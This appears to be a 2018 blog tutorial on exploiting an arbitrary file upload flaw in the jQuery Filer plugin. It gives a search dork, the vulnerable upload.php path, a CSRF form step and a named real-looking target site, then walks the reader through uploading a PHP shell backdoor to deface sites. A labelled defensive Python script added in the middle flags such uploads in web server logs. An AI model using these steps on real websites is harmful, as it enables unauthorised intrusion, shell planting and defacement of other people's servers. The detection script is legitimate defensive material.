Thursday, 25 October 2018

Jquery Filer Arbitrary File Upload

OK, let's get the materials ready first:
- Shell backdoor
- Dork: inurl:/factoring-company-testimonials.html
- Exploit: /plugins/jquery.filer/php/upload.php
- CSRF: Click here!

OK, let's go straight to the tutorial:

1. Start by dorking.

2. Pick the target you want to deface.

3. Append the exploit path, for example: http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/php/upload.php

4. Open the CSRF form, enter the target URL, and fill in the post data field with "files[]".

5. Lock!

6. Choose your shell, then upload it.

7. If it is vulnerable, it will look like this

8. Then open your shell:
    www.site.com/plugins/jquery.filer/uploads/shell.p.php
    http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/uploads/ex.p.php

9. OK, what you do with the shell is up to you ^_^
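
For defenders, the request pattern in steps 3 to 8 shows up in web server access logs. The following is an added example, not code from the original post: it flags a POST to the upload handler and any request for a script file under the uploads directory. The log lines, IP addresses and the extension list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths taken from the post: the upload handler and the directory it writes to.
UPLOAD_ENDPOINT = "/plugins/jquery.filer/php/upload.php"
UPLOADS_DIR = "/plugins/jquery.filer/uploads/"
# Extensions a PHP-enabled server may execute (assumed list, adjust per server).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "POST /plugins/jquery.filer/php/upload.php HTTP/1.1" 200 187 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:01:09 +0000] "GET /plugins/jquery.filer/uploads/ex.p.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /plugins/jquery.filer/uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:03:00 +0000] "GET /plugins/jquery.filer/uploads/shell.p.php HTTP/1.1" 404 150 "-" "Mozilla/5.0"',
]

def triage(lines):
    """Return (kind, client_ip, timestamp, path) tuples for suspicious requests."""
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in Combined Log Format
        ip, ts, method, target, status = m.groups()
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(urlsplit(target).path)
        lowered = path.lower()
        status = int(status)
        if method == "POST" and lowered == UPLOAD_ENDPOINT and status < 400:
            # Someone reached the upload handler and it accepted the request.
            findings.append(("upload", ip, ts, path))
        elif lowered.startswith(UPLOADS_DIR) and SCRIPT_EXT.search(lowered):
            # A script under the uploads directory was requested; a 200 means
            # the file exists and the server answered for it.
            kind = "script-executed" if status == 200 else "script-probe"
            findings.append((kind, ip, ts, path))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A 200 response for a script under the uploads directory means the server served an uploaded script file; that directory should hold static files only, with script execution disabled for it.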

OK, that's all for my tutorial.

Thanks,
